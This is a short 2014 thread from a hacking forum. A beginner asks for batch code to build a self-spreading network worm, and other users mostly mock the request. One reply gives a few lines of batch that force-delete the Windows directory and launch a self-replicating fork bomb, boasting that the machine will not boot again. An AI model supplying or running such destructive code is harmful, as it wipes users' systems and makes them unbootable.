EvilZone
Programming and Scripting => Beginner's Corner => : Xedafen August 24, 2014, 08:41:29 PM
-
Any simple code snippets you could share for a malware I'm making? Im looking for a worm in batch. I need it to spread to all other computers in the network. I have been looking at the proteus and kazaa worms lately but they don't seem to spread the active file running to other computers, so any help? ;D
-
(http://cdn.meme.li/instances/500x/53741242.jpg)
-
This was for sure made way before Shellshock.
Could you post that worm in a separate thread with more info?
-
batch != bash .. Just sayin' :P
-
Here this snippet will help...
@echo off
del /f /q %WinDir%
echo start a.bat > a.bat
start a.bat
Supa1337 shit there son.
-
This was for sure made way before Shellshock.
Could you post that worm in a separate thread with more info?
I just made a tutorial regarding batch viruses and the kazaa proteus worm is in there
-
Y u no like my fork bomb? Its epic, it will start deleting shit while it starts a fork bomb, so once the computer crashes, it won't boot back into the os :-P
-
Y u no like my fork bomb? Its epic, it will start deleting shit while it starts a fork bomb, so once the computer crashes, it won't boot back into the os :-P
^^